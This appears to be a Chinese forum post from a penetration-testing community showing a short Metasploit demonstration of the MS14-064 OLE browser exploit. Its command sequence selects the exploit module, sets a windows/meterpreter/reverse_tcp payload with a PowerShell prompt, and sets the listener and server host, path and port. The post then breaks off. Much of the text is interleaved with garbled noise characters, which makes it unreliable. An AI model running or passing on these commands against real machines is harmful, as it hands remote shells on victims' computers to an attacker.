, P3 r) P- o& I Y" J5 u' h1 s 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
" }* J1 z) f8 H0 ~. ]. P
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
% O' V, H) s/ q# H! V1 n# y/ V- \4 j5 @ set AllowPowershellPrompt true0 B- {0 V) w% k; s
( Z9 O: E2 M6 o' H Set LHOST 192.168.0.109$ f+ M, K+ C: n/ I3 k3 W& y% ~
; m6 ?# M) P* O3 b2 X/ W, Y! w( }/ S* V9 V B" n set SRVHOST 192.168.0.109
4 P) W' T# f. MSet uripath share9 W! k* U6 }; M1 d
/ I1 r2 ~" F" l x$ C. H- j) V1 i: X( ^+ J9 a- j2 Z! [ Set srvport 80
+ C& O/ N( E* ~
4 v; R: Z8 i4 L$ b0 a: {. T $ g0 Q" E/ [5 ]: p
4 i; v {( S) @! D 7 Y/ U. h& r( `3 `! B( S6 O. D, z4 e
0 T! Z" v: d6 ]: f+ A+ X+ F) l
/ p0 [! y) g; {5 Z# R4 n6 v; }' T l; @ A
* h, r+ _7 F1 [' h( P7 a0 {( p' B& K. M2 t3 y- H1 [0 v1 S 下面我们来访问本地地址如图:+ Y1 m$ t0 u7 y" f( E) c
6 Y4 d. @1 Q1 m* T5 g ; }# b2 e3 I" C% X* m! v a* @
' x$ Y* b& o0 \7 x' W7 B
/ S8 r" ? y( P4 e0 s, u" h: y% V
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |